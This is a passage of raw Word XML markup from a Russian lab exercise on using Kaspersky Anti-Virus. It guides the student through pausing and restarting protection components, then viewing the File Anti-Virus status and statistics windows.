        <w:t xml:space="preserve">Однако иногда это может потребоваться - например, при перемещении с диска на диск большого файла, и вы заведомо знаете, что он безопасен. Поэтому при нажатии кнопки </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пауза</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> появляется окно с предложен</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ем выбрать, когда нужно вернуть защиту в строй: через некий промежуток вр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">мени, после перезапуска антивируса или это должен сделать сам пользователь вручную, нажав кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="45720" cy="45720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="119" name="Рисунок 119" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-29.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId259" r:link="rId260" cstate="print">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Ознакомьтесь со всеми предлагаемыми сценариями включения защиты и нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ОК</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2392680" cy="1196340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="120" name="Рисунок 120" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-30.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId261" r:link="rId262">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2392680" cy="119634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Вернувшись к главному окну, проследите за произошедшими изм</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нениями.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Обратите внимание, что строка со статусом защиты теперь выглядит з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>темненной, а ее текст гласит, что защита приостановлена (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="693420" cy="144780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121" name="Рисунок 121" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-31.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId263" r:link="rId264">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="693420" cy="144780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">). При этом также затенена кнопка </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пауза</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, а вот </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> стал активным (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="518160" cy="160020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="122" name="Рисунок 122" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/12/3-32.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId265" r:link="rId266">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="518160" cy="160020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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23" name="Рисунок 123" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-33.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId267" r:link="rId268">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jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Перейдите к подразделу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Файловый Антивирус</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Изучите представленную в окне информацию. Обратите внимание на группу " </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Статус</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">" в информационной части окна. К ней подается краткая сводка основных настроек, в том числе текущий статус компонента. В данном случае видно, что </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Файловый Антивирус</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> приостановлен ("</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пауза</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">"). Об этом же символизирует и надпись в заголовке: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1257300" cy="129540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124" name="Рисунок 124" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-34.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId269" r:link="rId270">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1257300" cy="12954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465320" cy="3307080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="125" name="Рисунок 125" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-35.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId271" r:link="rId272">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4465320" cy="330708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 xml:space="preserve">Запустите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Файловый Антивирус</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, нажав кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="152400" cy="152400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="126" name="Рисунок 126" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-36.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId259" r:link="rId2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E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проследите за изменениями в интерфейсе окна. Обратите внимание, что произошел запуск только файлового антивируса, все остальные компоне</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ты остались выключенными. Об этом свидетельствует затененность названий подразделов раздела </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Защита</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в меню левой части окна. При этом общее назв</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ние </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Защита</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> опять стало черным </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4693920" cy="3474720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="127" name="Рисунок 127" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-37.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId274" r:link="rId275">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4693920" cy="34747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 xml:space="preserve">Наведите курсор на поле группы настроек " </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Статус</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>" и нажмите л</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">вую клавишу мыши </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вследствие этого действия откроется изученное в предыдущем з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">дании окно </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, причем на разделе, посвященном непосредственно файловому антивирусу.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Нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Закрыть</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и вернитесь к главному окну интерфейса</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008120" cy="3284220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="128" name="Рисунок 128" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-38.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId276" r:link="rId277">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Обратите внимание на группу "</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Статистика</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>". В ней сказываются основные результаты работы выбранного компонента. В данном случае - фа</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">лового антивируса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29" name="Рисунок 129" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-39.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId274" r:link="rId278">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Для получения подробного отчета, щелкните по полю группы "</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Статистика</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221480" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130" name="Рисунок 130" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-40.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId279" r:link="rId280">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4221480" cy="30480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Открывшееся окно содержит подробную статистику работы комп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нента. Просмотрите содержание всех четырех закладок: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обнаружено</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Соб</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тия</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Статистика</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Параметры</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Закрыть</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и вернитесь к главном у окну интерфе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">са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31" name="Рисунок 131" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-41.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId274" r:link="rId281">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Теперь повторите эти же действия, начиная с пункта 7, только применительно ко всем трем оставшимся компонентам защиты: почтовому антив</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">русу, веб-антивирусу и проактивной защите.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 результате выполнения этого задания все компоненты постоянной з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щиты должны быть включены</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579620" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132" name="Рисунок 132" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-42.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
